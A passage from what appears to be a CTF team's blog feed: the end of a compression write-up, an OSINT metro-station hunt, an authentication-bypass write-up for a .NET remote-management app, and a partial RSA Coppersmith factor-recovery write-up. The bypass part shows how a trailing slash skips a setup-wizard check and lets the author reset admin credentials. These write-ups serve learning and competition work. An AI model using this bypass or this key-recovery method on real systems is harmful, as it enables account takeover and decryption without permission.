<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="n">prog</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">__traceback__</span><span class="p">.</span><span class="n">tb_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_locals</span><span class="p">[</span><span class="s">"prog"</span><span class="p">]</span>

<span class="k">exec</span><span class="p">(</span><span class="sa">r</span><span class="s">"""
table = (145,22134,14665,7025,20,43498,6070,2551,60,13988,38948,1820,30148,15,85,6351,5350,25,5,65,555,14565,2027,295,735,45643,29266,7705,42888,10966,21,4875,325,4725,53578,57958,14261,1220,29394,60128,26679,45243,275,2250,1350,23954,585,430,90,35098,11101,49537,401,51258,1,64213,10636,4410,1945,10338,2786,42248,14110,9063,51277,5,1385,330)
offs = (42,0,29,13,19,3,0,0,0,0,0)
def lookup(th):
    lo = 2
    hi = 61828
    while lo &lt; hi:
        mid = (lo + hi) // 2
        a = prog.rfind(",", 0, mid)+1
        b = prog.find(",", mid)
        h = table[ord(prog[b-1]) - 65]
        for i in range(b-a):
            if i &lt; len(offs):
                h += table[ord(prog[a+i]) + offs[i] - 65]
        if h &lt; th:
            lo = mid + 1
        else:
            hi = mid
    return lo

leet_table = {
    'A': '4',
    'B': '8',
    'E': '3',
    'G': '6',
    'I': '1',
    'O': '0',
    'S': '5',
    'T': '7',
    'Z': '2'
}

cur_byte = 0
cur_bit = 0

def read_bits(n):
    global cur_bit, cur_byte
    res = 0
    resbits = 0
    while resbits &lt; n:
        chunk = min(n - resbits, 8 - cur_bit)
        t = (data[cur_byte] &gt;&gt; cur_bit) &amp; ((1 &lt;&lt; chunk) - 1)
        res |= t &lt;&lt; resbits
        resbits += chunk
        cur_bit += chunk
        if cur_bit == 8:
            cur_bit = 0
            cur_byte += 1
    return res

p = 0
while p &lt; 2028:
    t = lookup(read_bits(18))
    while prog[t] != ",":
        c = prog[t]
        if c in leet_table and read_bits(1):
            sys.stdout.write(str(leet_table[c]))
        else:
            sys.stdout.write(c)
        t += 1
        p += 1
    sys.stdout.write(" ")
    sys.stdout.flush()
    p += 1

while p &lt; 2048:
    print(chr(read_bits(8)), end="")
    p += 1

sys.stdout.flush()
exit(0)
"""</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="conclusion">Conclusion</h2>

<p>This compressor is able to encode 2048 bytes of data in around 740 bytes on average (around 1308 points), more than sufficient to top the leaderboard. Running it several times produces different results, with the best result out of several runs being 1320 points (flag: <code class="language-plaintext highlighter-rouge">941379cb175c2e078e9d65606fc4ef3048468e0a4d45c717094dd268c0cafb60.1320</code>).</p>
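<p>As a rough check on where the savings come from, the encoded size of a run of words can be computed directly from the scheme: 18 bits per word plus one bit per character that has a 1337 substitute. The sample words below are taken from the wordlist excerpts shown earlier; the helper names are made up for this sketch:</p>

```python
LEET_LETTERS = set("ABEGIOSTZ")  # keys of leet_table in the decoder
BITS_PER_WORD = 18


def encoded_bits(words):
    """Bits used by the scheme: a fixed-size hash plus one flag bit per leetable letter."""
    total = 0
    for word in words:
        total += BITS_PER_WORD
        total += sum(1 for ch in word if ch in LEET_LETTERS)
    return total


def encoded_bytes(words):
    # Round up to whole bytes.
    return (encoded_bits(words) + 7) // 8


sample = ["THE", "NETWORK", "OLYMPIC"]
# Each word is followed by a single space in the plaintext.
plain_len = sum(len(w) + 1 for w in sample)

print(plain_len, "plaintext bytes become", encoded_bytes(sample), "encoded bytes")
```

<p>The figures quoted above (2048 bytes in, about 740 bytes out, about 1308 points) are consistent with a score equal to input size minus output size, though that scoring rule is an inference from the numbers rather than something stated here.</p>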

<p>For “style” reasons, I decided to go a little further. Changing the constant 2028 to 2040 reduces the length of the (inefficiently-encoded) tail, at the risk of occasionally failing if the final word is too long. With this change, I was able to quickly obtain a score of <strong>1337 points</strong> (flag: <code class="language-plaintext highlighter-rouge">2fdd6a0e1801daa160f5475fb710879dd3f1bf6774da6c92e8f63867849b1cef.1337</code>). I also obtained slightly higher scores (up to 1340: <code class="language-plaintext highlighter-rouge">d5aedd5fcd9177849ba5d174c79a7074d66f60d911338616eb044290d9081088.1340</code>), but chose not to submit them. Here’s what the leaderboard looked like by the end of the CTF:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>           Team           |     Score       |           Time             
--------------------------+-----------------+----------------------------
 Maple Bacon              | {"score": 1337} | 2024-06-30 19:24:57.567+00
 thehackerscrew           | {"score": 980}  | 2024-06-30 19:49:18.4+00
 r3kapig                  | {"score": 859}  | 2024-06-30 13:29:04.553+00
 The Flat Network Society | {"score": 856}  | 2024-06-29 17:17:16.553+00
 Team Austria             | {"score": 850}  | 2024-06-29 19:03:02.087+00
 Perperikon               | {"score": 843}  | 2024-06-29 19:59:56.281+00
 Brunnerne                | {"score": 837}  | 2024-06-30 12:09:16.699+00
 Kalmarunionen            | {"score": 649}  | 2024-06-30 15:04:40.344+00
 pwnlentoni               | {"score": 603}  | 2024-06-30 10:46:12.362+00
 gsitcia                  | {"score": 512}  | 2024-06-30 01:46:13.402+00
</code></pre></div></div>

<p>This was a very fun challenge, with a rather unexpected twist in the form of some harsh restrictions on the Python side. Here’s a summary of the solution:</p>

<ul>
  <li>Use <code class="language-plaintext highlighter-rouge">gperf</code> to produce a perfect hash function for the wordlist, which can be efficiently implemented in C and compiled with the XC8 compiler.</li>
  <li>The compressor outputs 18 bits per word (regardless of word length), plus one bit per 1337-speakable character in the word.</li>
  <li>On the decompressor side, smuggle the entire wordlist in a comment to keep the overall size under the command-line argument size, and to avoid blowing the memory limit during <code class="language-plaintext highlighter-rouge">exec</code>.</li>
  <li>Obtain access to the embedded wordlist by extracting the <code class="language-plaintext highlighter-rouge">prog</code> variable from the parent stack frame via an exception object.</li>
  <li>Clear <code class="language-plaintext highlighter-rouge">sys.argv</code> to free up a bit more memory, and use a nested <code class="language-plaintext highlighter-rouge">exec</code> to avoid immediately blowing the memory limit in the outer <code class="language-plaintext highlighter-rouge">exec</code>.</li>
  <li>Use a binary search to search the wordlist each time, to avoid allocating more than O(1) extra memory, and avoid blowing the CPU time limit on an expensive (but simple) linear search.</li>
  <li>Use a slightly more aggressive implementation with a small probability of failure in order to score exactly 1337 points (“style”).</li>
</ul>]]></content><author><name>Robert Xiao</name></author><summary type="html"><![CDATA[Problem Description]]></summary></entry><entry><title type="html">[R3CTF/YUANHENGCTF-2024] Transit</title><link href="https://maplebacon.org/2024/06/r3ctf-yuanhengctf2024-Transit/" rel="alternate" type="text/html" title="[R3CTF/YUANHENGCTF-2024] Transit" /><published>2024-06-15T00:00:00+00:00</published><updated>2024-06-15T00:00:00+00:00</updated><id>https://maplebacon.org/2024/06/r3ctf-yuanhengctf2024-Transit</id><content type="html" xml:base="https://maplebacon.org/2024/06/r3ctf-yuanhengctf2024-Transit/"><![CDATA[<h2 id="r3ctfyuanhengctf-2024-transit-challenge-misc">R3CTF/YUANHENGCTF 2024 Transit Challenge [MISC]</h2>

<p>Authors: <a href="https://jade.fyi">Jade Lovelace</a>, <a href="https://github.com/frankuyan">Frank Yan</a></p>

<h2 id="tldr">TL;DR</h2>
<p>Utilize the overhead signage to identify the city and metro system. Scan through local Chinese media for any images of local metro rolling stock.  Use the rolling stock number to identify the line and stations. Use the street view images and line schematic to identify the station.</p>

<h2 id="challenge-description">Challenge Description</h2>

<p>This is an OSINT chal! The city’s rail transit is like the veins of time, glides effortlessly through the concrete jungle, transforming every journey into a flowing tapestry. So which station is this?</p>

<p>The flag format is R3CTF{city_lowercase_name_endswith_station}. For example the Huixin Xijie Nankou station of the Beijing Subway would be R3CTF{beijing_huixin_xijie_nankou_station}.</p>

<h2 id="the-image">The Image</h2>
<p><img src="/assets/images/r3ctf2024/e6007e3f-e141-470a-8294-6828ffe8bc43.jpg" alt="image" /></p>

<h2 id="solution">Solution</h2>
<p>We took the image and stared at it to try to figure out if it was a metro or mainline railway. Our main hint that it was a metro is the grade in the background but we kinda just guessed.</p>

<p>We looked at the overhead signage identifying the supports for the catenary, and noticed that it was in two parts, the first one seemingly being track ID or segment ID or so, and the second one being sequential as you go along the line, as seen in the picture.</p>

<p>We decided to identify the system by just <a href="https://en.wikipedia.org/wiki/Urban_rail_transit_in_China#Urban_rapid_transit_lines">dorking Wikipedia</a> and googling around for Chinese metros, looking for ones that use the same style of trackside signage for their overhead lines.</p>

<p>Google results usually yield schematic subway maps of the system. Thankfully Frank does read Chinese, and Baidu is more helpful in giving out images of rolling stock on tracks.</p>

<p>We started out with “[<code class="language-plaintext highlighter-rouge">Name of tier one/two Chinese cities</code>] + 地铁轨道交通 + 铁轨 (subway transportation system + railtracks)” and found some images.</p>

<p>Shanghai does not have visible hanging signs on overhead powerlines.</p>

<p><img src="/assets/images/r3ctf2024/1a29e466-761d-4266-9532-d3bc3ba22e70.png" alt="Shanghai" /></p>

<p>Beijing does use a few hanging signs, but they are usually three digit numbers on a blue background.</p>

<p><img src="/assets/images/r3ctf2024/5162f04c-1a34-4d29-ba82-d18e39217c95.png" alt="Beijing" /></p>

<p>Chengdu, on the other hand, uses a three-character system whose first character is a letter. Although the color scheme does resemble the image (black letters on white), it uses a different font with wider characters.</p>

<p><img src="/assets/images/r3ctf2024/d1075b76-ab75-41c4-82ed-3213dfbb8721.png" alt="Chengdu" /></p>

<p>After going through an exhaustive list of tier one and two Chinese cities, we stumbled upon a picture from Hangzhou’s metro system.</p>

<p>It has overhead signage that actually matches the same track segment, M368.</p>

<p><img src="/assets/images/r3ctf2024/c7405574-8c7a-46f0-8418-3e8bc8d0e3d9.png" alt="Hangzhou" /></p>

<p>We now have the rolling stock number <code class="language-plaintext highlighter-rouge">190181</code> and the line color turquoise blue. Given that the majority of Chinese systems use a numbered system to name metro lines and associate a unique color to each line, we are getting closer to the flag.</p>

<p>We then went on Wikipedia looking at Hangzhou metro, to figure out which line it was by looking at the rolling stock and found it was line 19:</p>

<p><img src="/assets/images/r3ctf2024/35c99cb7-1d8b-4bdd-9cc7-85e464993e63.png" alt="Line 19" /></p>

<p>Line 19 is an airport express line that only partially opened in 2022. Baidu Baike tells us that there are four elevated stations on line 19.</p>

<p><img src="/assets/images/r3ctf2024/7711c0fa-bfd8-445a-9d40-2aaef9e75b65.png" alt="Baidu Baike" /></p>

<p>高架 means elevated while 地下 means underground. This helps us narrow the candidates down to:</p>
<ul>
  <li>御道站 (Yudao Station)</li>
  <li>平澜路站 (Pinglan Road Station)</li>
  <li>耕文路站 (Gengwen Road Station)</li>
  <li>知行路站 (Zhixing Road Station)</li>
</ul>

<p>These stations all share the common features of being elevated and running in parallel along the Hangyong Expressway (the viaduct in the picture), so those features alone cannot tell them apart.</p>

<p>We decided to further examine the street view at each of the four sites.</p>

<p>平澜路站 (Pinglan Road Station) provides a view of a four-lane highway with rows of trees densely lining its sides. We decided to move on to the other three stations, but the same highway is repeated throughout.</p>

<p>Until we realized…</p>

<p><img src="/assets/images/r3ctf2024/34d246c8-ba1d-4f09-b539-8e74070ac546.png" alt="Street View" /></p>

<p>These images are from August 2017.</p>

<p>Clearly, given China’s otherworldly pace of construction, most information from 2017 can be considered to be outdated.</p>

<p>Hence, we just tried inputting the name of each of the four stations.</p>

<h2 id="flag">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">R3CTF{hangzhou_zhixing_road_station}</code></p>]]></content><author><name>frankuu</name></author><summary type="html"><![CDATA[R3CTF/YUANHENGCTF 2024 Transit Challenge [MISC]]]></summary></entry><entry><title type="html">[NahamCon CTF 2024] Helpful Desk</title><link href="https://maplebacon.org/2024/06/nahamconctf-helpfuldesk/" rel="alternate" type="text/html" title="[NahamCon CTF 2024] Helpful Desk" /><published>2024-06-01T00:00:00+00:00</published><updated>2024-06-01T00:00:00+00:00</updated><id>https://maplebacon.org/2024/06/nahamconctf-helpfuldesk</id><content type="html" xml:base="https://maplebacon.org/2024/06/nahamconctf-helpfuldesk/"><![CDATA[<h2 id="problem-description">Problem Description</h2>

<blockquote>
  <p>HelpfulDesk is the go-to solution for small and medium businesses who need remote monitoring and management. Last night, HelpfulDesk released a security bulletin urging everyone to patch to the latest patch level. They were scarce on the details, but I bet that can’t be good…</p>
</blockquote>

<p>This was categorized as a web challenge, although most of my time on it was spent reverse engineering.</p>

<p>Difficulty: easy</p>

<h2 id="initial-research">Initial Research</h2>

<p>Opening up the URL, we see what is supposed to be the login page of a remote access
tool. There’s a note at the top telling us to download the latest update
for important security fixes. Clicking the note brings us to an “updates” page
with a list of releases we can download. Presumably the current instance is
running the old insecure version, so let’s download both it and the latest release and
find the difference.</p>

<h2 id="exploring-the-codebase">Exploring the codebase</h2>

<p>Downloading the two versions and unzipping them, we see this is a .NET server.
Running diff on the folders, we see the only thing that has changed is
HelpfulDesk.dll.</p>

<h2 id="decompiling">Decompiling</h2>

<p>Let’s decompile the old and new versions of the DLL with AvaloniaILSpy.
Renaming the dlls for convenience to HelpfulDesk-old and HelpfulDesk-new,
we can conveniently export the decompiled code to a flat text file by
right-clicking each dll and choosing “Save Code.”</p>

<p>Now we can open both files in Emacs and use ediff to find the changes.
After skipping through the filenames and a few uninteresting hashes, we
only find one significant change:</p>

<h3 id="helpfuldesk-newdll">HelpfulDesk-new.dll</h3>

<div class="language-c# highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">public</span> <span class="n">IActionResult</span> <span class="nf">SetupWizard</span><span class="p">()</span>
  <span class="p">{</span>
      <span class="c1">//IL_0018: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="c1">//IL_001d: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">File</span><span class="p">.</span><span class="nf">Exists</span><span class="p">(</span><span class="n">_credsFilePath</span><span class="p">))</span>
      <span class="p">{</span>
          <span class="n">PathString</span> <span class="n">path</span> <span class="p">=</span> <span class="p">((</span><span class="n">ControllerBase</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">get_HttpContext</span><span class="p">().</span><span class="nf">get_Request</span><span class="p">().</span><span class="nf">get_Path</span><span class="p">();</span>
          <span class="kt">string</span> <span class="n">text</span> <span class="p">=</span> <span class="p">((</span><span class="n">PathString</span><span class="p">)(</span><span class="k">ref</span> <span class="n">path</span><span class="p">)).</span><span class="nf">get_Value</span><span class="p">().</span><span class="nf">TrimEnd</span><span class="p">(</span><span class="sc">'/'</span><span class="p">);</span>
          <span class="k">if</span> <span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="nf">Equals</span><span class="p">(</span><span class="s">"/Setup/SetupWizard"</span><span class="p">,</span> <span class="n">StringComparison</span><span class="p">.</span><span class="n">OrdinalIgnoreCase</span><span class="p">))</span>
          <span class="p">{</span>
              <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">(</span><span class="s">"Error"</span><span class="p">,</span> <span class="p">(</span><span class="kt">object</span><span class="p">)</span><span class="k">new</span> <span class="n">ErrorViewModel</span>
                                                                    <span class="p">{</span>
                                                                        <span class="n">RequestId</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">ExceptionMessage</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">StatusCode</span> <span class="p">=</span> <span class="m">403</span>
                                                                    <span class="p">});</span>
          <span class="p">}</span>
      <span class="p">}</span>
      <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">();</span>
  <span class="p">}</span>
</code></pre></div></div>

<h3 id="helpfuldesk-olddll">HelpfulDesk-old.dll</h3>

<div class="language-c# highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">public</span> <span class="n">IActionResult</span> <span class="nf">SetupWizard</span><span class="p">()</span>
  <span class="p">{</span>
      <span class="c1">//IL_0018: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="c1">//IL_001d: Unknown result type (might be due to invalid IL or missing references)</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">File</span><span class="p">.</span><span class="nf">Exists</span><span class="p">(</span><span class="n">_credsFilePath</span><span class="p">))</span>
      <span class="p">{</span>
          <span class="n">PathString</span> <span class="n">path</span> <span class="p">=</span> <span class="p">((</span><span class="n">ControllerBase</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">get_HttpContext</span><span class="p">().</span><span class="nf">get_Request</span><span class="p">().</span><span class="nf">get_Path</span><span class="p">();</span>
          <span class="kt">string</span> <span class="k">value</span> <span class="p">=</span> <span class="p">((</span><span class="n">PathString</span><span class="p">)(</span><span class="k">ref</span> <span class="n">path</span><span class="p">)).</span><span class="nf">get_Value</span><span class="p">();</span>
          <span class="k">if</span> <span class="p">(</span><span class="k">value</span><span class="p">.</span><span class="nf">Equals</span><span class="p">(</span><span class="s">"/Setup/SetupWizard"</span><span class="p">,</span> <span class="n">StringComparison</span><span class="p">.</span><span class="n">OrdinalIgnoreCase</span><span class="p">))</span>
          <span class="p">{</span>
              <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">(</span><span class="s">"Error"</span><span class="p">,</span> <span class="p">(</span><span class="kt">object</span><span class="p">)</span><span class="k">new</span> <span class="n">ErrorViewModel</span>
                                                                    <span class="p">{</span>
                                                                        <span class="n">RequestId</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">ExceptionMessage</span> <span class="p">=</span> <span class="s">"Server already set up."</span><span class="p">,</span>
                                                                        <span class="n">StatusCode</span> <span class="p">=</span> <span class="m">403</span>
                                                                    <span class="p">});</span>
          <span class="p">}</span>
      <span class="p">}</span>
      <span class="k">return</span> <span class="p">(</span><span class="n">IActionResult</span><span class="p">)(</span><span class="kt">object</span><span class="p">)((</span><span class="n">Controller</span><span class="p">)</span><span class="k">this</span><span class="p">).</span><span class="nf">View</span><span class="p">();</span>
  <span class="p">}</span>
</code></pre></div></div>

<h2 id="exploit">Exploit</h2>

<p>I don’t know the exact mechanisms here, but at
a high level it seems to be controlling access to the /Setup/SetupWizard
endpoint. If the credential file exists, it denies access to the endpoint.
Presumably the SetupWizard lets us reset credentials, so this ensures only the
admin doing the initial setup can access it.</p>

<p>The difference between the function in the old and new files is that the new one
strips trailing slashes from the request path before comparing it to /Setup/SetupWizard. We can see the security flaw: if
we navigate to the path with a trailing slash, the old value.Equals() check won’t match,
but ASP.NET will ignore the slash and serve us the Setup page.</p>
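
<p>The difference between the two checks can be reproduced with plain string handling. The following is a minimal sketch, not the server’s code: the function names are made up for illustration, and Python’s <code class="language-plaintext highlighter-rouge">lower()</code> only approximates <code class="language-plaintext highlighter-rouge">StringComparison.OrdinalIgnoreCase</code>. It models the path comparison alone, not ASP.NET routing.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BLOCKED = "/setup/setupwizard"


def old_check_blocks(path):
    # Old build: compare the raw request path, ignoring case.
    return path.lower() == BLOCKED


def new_check_blocks(path):
    # Patched build: strip trailing slashes before comparing.
    return path.rstrip("/").lower() == BLOCKED


for candidate in ["/Setup/SetupWizard", "/Setup/SetupWizard/"]:
    # Prints the path, then whether the old and the patched check would block it.
    print(candidate, old_check_blocks(candidate), new_check_blocks(candidate))
</code></pre></div></div>

<p>Only the path with the trailing slash slips past the old check while still being caught by the patched one.</p>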

<p>Giving it a try, this works! I get the setup page and reset the login credentials. I
then login and find the flag on the first connected computer’s desktop.</p>]]></content><author><name>edaigle</name></author><summary type="html"><![CDATA[Problem Description]]></summary></entry><entry><title type="html">[SDCTF 2024] ReallyComplexProblem</title><link href="https://maplebacon.org/2024/05/sdctf-reallycomplexproblem/" rel="alternate" type="text/html" title="[SDCTF 2024] ReallyComplexProblem" /><published>2024-05-19T00:00:00+00:00</published><updated>2024-05-19T00:00:00+00:00</updated><id>https://maplebacon.org/2024/05/sdctf-reallycomplexproblem</id><content type="html" xml:base="https://maplebacon.org/2024/05/sdctf-reallycomplexproblem/"><![CDATA[<h2 id="problem-description">Problem Description</h2>

<p>We have a ciphertext that we have to decrypt in 48 hours. Luckily, one of our guys at the NSA was able to take a
screenshot of the computer as it was performing the encryption, unfortunately it only captured part of the screen. Can
you help us break the cipher?</p>

<ul>
  <li>Difficulty: Hard</li>
  <li>Tags: Crypto</li>
  <li>author: 18lauey2</li>
</ul>

<h4 id="attachments">Attachments</h4>

<p><a href="/assets/code/sdctf-2024/reallycomplexproblem/CRSA.py">CRSA.py</a> 
<a href="/assets/code/sdctf-2024/reallycomplexproblem/LEAK.png">LEAK.png</a></p>

<h2 id="tldr">TL;DR</h2>
<p>A modified Coppersmith method: convert the complex-valued matrix into a real matrix through a canonical embedding, then
solve it like normal.</p>

<h2 id="introduction-audience-and-pre-requisites">Introduction, audience, and pre-requisites</h2>

<p>This writeup, like most of my writeups, is geared towards people with an elementary understanding of Math. Additionally,
this writeup focuses on the logic behind the solution as opposed to <em>just</em> the solution.</p>

<p>The pre-requisites that would be nice to know before reading this are:</p>
<ul>
  <li>The RSA encryption and decryption scheme</li>
  <li>Basic modular arithmetic</li>
  <li>Matrix algebra (vectors, linear combinations, and matrices)</li>
  <li>An elementary understanding of complex numbers</li>
</ul>

<p>Alright then. Sit tight and buckle up because we are in for a doozy!</p>

<h2 id="challenge-overview-and-inspecting-the-code">Challenge Overview and Inspecting the Code</h2>

<p>The challenge performs RSA with complex integers (Gaussian Integers: $\mathbb{Z}[i]$) as opposed to regular Integers
$\mathbb{Z}$. A Complex integer is a complex number $a + bi$ such that $a, b \in \mathbb{Z}$.</p>

<p>Fortunately, the logic behind the algorithm, Complex-RSA (CRSA), remains fairly familiar with a few caveats:</p>
<ul>
  <li>We say that a Gaussian integer $w$ is prime if its norm is prime.
    <ul>
      <li>“What’s a norm?” In this case, consider a norm to be defined as $Re(w)^2 + Im(w)^2$. (This can be interpreted,
geometrically, as the square of the point’s distance from the origin.)</li>
    </ul>
  </li>
  <li>Once we generate our primes <code class="language-plaintext highlighter-rouge">p</code> and <code class="language-plaintext highlighter-rouge">q</code>, the
rest of the process is the same as regular RSA. (I’m skipping over
details for modular exponentiation because it’s not relevant to the challenge.)</li>
</ul>
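
<p>As a small illustration of the norm, here is a sketch with toy Gaussian integers stored as <code class="language-plaintext highlighter-rouge">(real, imaginary)</code> pairs. The helper names and the values are chosen for this example and are not taken from the challenge code.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def norm(re, im):
    # Square of the distance from the origin: Re(w)^2 + Im(w)^2.
    return re * re + im * im


def gaussian_mul(x, y):
    # (a + bi)(c + di) = (ac - bd) + (ad + bc)i
    return (x[0] * y[0] - x[1] * y[1], x[0] * y[1] + x[1] * y[0])


p = (2, 3)               # 2 + 3i, norm 13 (a prime)
q = (1, 4)               # 1 + 4i, norm 17 (a prime)
n = gaussian_mul(p, q)   # toy modulus N = p * q

print(n, norm(*p), norm(*q), norm(*n))
</code></pre></div></div>

<p>The norm is multiplicative, so the norm of the toy modulus equals the product of the two prime norms.</p>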

<p>The second part of the challenge involves our LEAKed picture, which features a terminal whose output shows the values
of <code class="language-plaintext highlighter-rouge">N</code>, <code class="language-plaintext highlighter-rouge">ciphertext</code>, and some portion of <code class="language-plaintext highlighter-rouge">p</code>. Interestingly enough, we see about two-thirds of both the real and the
imaginary part of <code class="language-plaintext highlighter-rouge">p</code>, with the rest covered by the beautiful hand-drawn raccoon.</p>

<h2 id="but-were-missing-bits-now-what">But we’re missing bits! Now what?</h2>

<p>You’re right. There is still a bit of work to do if we would like to decrypt our message. Alright, let’s take a deep
breath and work step-by-step. What information do we need to retrieve the original plaintext <code class="language-plaintext highlighter-rouge">m</code>?</p>

<p>To decrypt a message we need <code class="language-plaintext highlighter-rouge">d</code>, which is defined as <code class="language-plaintext highlighter-rouge">e^-1 (mod (norm(p)-1)*(norm(q)-1))</code>. To find <code class="language-plaintext highlighter-rouge">d</code>, we need <code class="language-plaintext highlighter-rouge">p</code> and
<code class="language-plaintext highlighter-rouge">q</code>, which in turn requires us to factor <code class="language-plaintext highlighter-rouge">N = pq</code>. To factor <code class="language-plaintext highlighter-rouge">N</code>, we need to recover <code class="language-plaintext highlighter-rouge">p</code> from the information that
was leaked and then divide <code class="language-plaintext highlighter-rouge">N</code> by <code class="language-plaintext highlighter-rouge">p</code>.</p>
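
<p>The formula for <code class="language-plaintext highlighter-rouge">d</code> can be tried out on toy numbers. This sketch assumes made-up prime norms 13 and 17 and a small public exponent; none of these values come from the challenge.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>e = 5                        # toy public exponent (the challenge uses 65537)
norm_p, norm_q = 13, 17      # toy prime norms, for example of 2+3i and 1+4i

phi = (norm_p - 1) * (norm_q - 1)
d = pow(e, -1, phi)          # modular inverse; needs Python 3.8 or newer

print(phi, d, (e * d) % phi)
</code></pre></div></div>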

<p><strong>Oh boy.</strong> That’s a lot. All these steps are fairly straightforward with the exception of recovering <code class="language-plaintext highlighter-rouge">p</code>. So, our goal
is to recover this value.</p>

<p>After some painful counting and testing, we find roughly 155 digits in each of the real and imaginary parts. We have
about 85 and 87 of these digits respectively. (Okay, maybe it wasn’t two-thirds…)</p>

<p>Retrieving these missing bits seems hard. Let’s consider a simpler problem: What if this was regular RSA and we had
about 60% of p? As it turns out, someone has solved this problem before.</p>

<h2 id="a-copper-sword-crafted-by-the-kingdoms-finest-blacksmith">A Copper sword crafted by the kingdom’s finest blackSmith</h2>

<p>Enter the Coppersmith method. In a nutshell, the method finds small integer roots of polynomials modulo a given integer.
To clarify, this means that if we have a polynomial of the form $F(x) = x^n + a_{n-1}x^{n-1} + \dots + a_1x + a_0$ whose
coefficients $a_i$ are integers modulo $N$, and we know that there exists some integer $x_0$ such that $F(x_0) \equiv 0
\text{ (mod N)}$ and $|x_0|$ is less than $N^{\frac{1}{n}}$, we can find $x_0$.</p>

<p>You might be wondering, “cool fact. What does this have to do with us?” The answer is <em>everything</em>. Let me take you
through this step-by-step.</p>

<ol>
  <li>Recall that we have knowledge of <code class="language-plaintext highlighter-rouge">N</code>, the fact that <code class="language-plaintext highlighter-rouge">N = p * q</code>, and a fair chunk of <code class="language-plaintext highlighter-rouge">p</code> (let’s say about
 110 digits of 155 digits).</li>
  <li>We can express <code class="language-plaintext highlighter-rouge">p</code> as follows: <code class="language-plaintext highlighter-rouge">p = the_known_part + the_unknown_part</code>. Mathematically, $p = a + r$
  where $a$ and $r$ are the known and unknown parts of $p$ respectively.
    <ul>
      <li>For example if <code class="language-plaintext highlighter-rouge">p = 382xx</code>, we would express it as $p = 38200 + r$.</li>
    </ul>
  </li>
  <li>We also have that $r$ is less than $10^{45}$ since $r$ has 45 digits. Thus, we get an upper bound $R = 10^{45}$.</li>
  <li>Let’s create a polynomial $f(x)$ modulo $p$. We will define $f(x) = a + x$ where $a$ is a constant which represents
 the known part of $p$.
    <ul>
      <li>In the definition of the method above, $n = 1$ (aka the degree of the polynomial we must solve)</li>
    </ul>
  </li>
  <li>Now, $f(r) = a + r = p \equiv 0 \text{ (mod p)}$. In other words, $r$ is our small integer root $x_0$ from the
definition above.</li>
  <li>Note that $r$ is less than $R$, which is less than $p^{\frac{1}{1}} = p^1$, which is less than $N$.</li>
  <li>YAY! This is literally what the Coppersmith method needs to work.</li>
</ol>
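
<p>The steps above can be checked on the <code class="language-plaintext highlighter-rouge">382xx</code> example. This is only a sketch with toy values: the full <code class="language-plaintext highlighter-rouge">p</code>, the second factor <code class="language-plaintext highlighter-rouge">q</code>, and the variable names are assumptions made for illustration, and the code peeks at <code class="language-plaintext highlighter-rouge">p</code> to confirm the root rather than recovering it.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>p = 38237          # toy secret factor, seen as 382xx once two digits are hidden
q = 101            # toy second factor
N = p * q

a = 38200          # known part of p
R = 10 ** 2        # two hidden digits, so the unknown part is below R


def f(x):
    # Degree-one polynomial whose root modulo p is the unknown part of p.
    return a + x


r = p - a          # the small root an attacker wants to recover
print(r, f(r) % p, N % p)
</code></pre></div></div>

<p>Both <code class="language-plaintext highlighter-rouge">f(r)</code> and <code class="language-plaintext highlighter-rouge">N</code> vanish modulo <code class="language-plaintext highlighter-rouge">p</code>, which is the property the rest of the method builds on.</p>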

<p><img src="https://media1.tenor.com/m/sqYV7D2euF8AAAAC/kronk-oh-yeah-its-all-coming-together.gif" alt="oh yeah, it's all coming together" /></p>

<h2 id="the-coppersmith-attack-is-truly-one-of-the-attacks-of-all-time">The Coppersmith Attack is truly one of the attacks of all time</h2>

<p>Now that we have the pieces, let’s apply the Coppersmith method to find our $x_0$ ($r$). Firstly, it’s good to
understand a bit of our motivation here. It is very difficult to find the roots of an integer polynomial modulo some
integer N. However, it is (relatively) easy to find the roots of the same polynomial over the integers. The
method takes in our polynomial $f(x)$, performs a bit of magic, and, in combination with the Howgrave-Graham theorem,
converts our polynomial modulo N into a simple polynomial with the same small roots over the integers (no modulo).</p>

<h3 id="the-howgrave-graham-theorem">The Howgrave-Graham Theorem</h3>
<p>Okay, so the (extremely abridged version of) Howgrave-Graham Theorem states that for a polynomial $g(x)$, if:</p>
<ul>
  <li>$g(x_0) \equiv 0 \text{ (mod }b^k\text{)}$ for some $b, k$</li>
  <li>$|x_0| \le R$, where $R$ is the upper bound we discussed earlier</li>
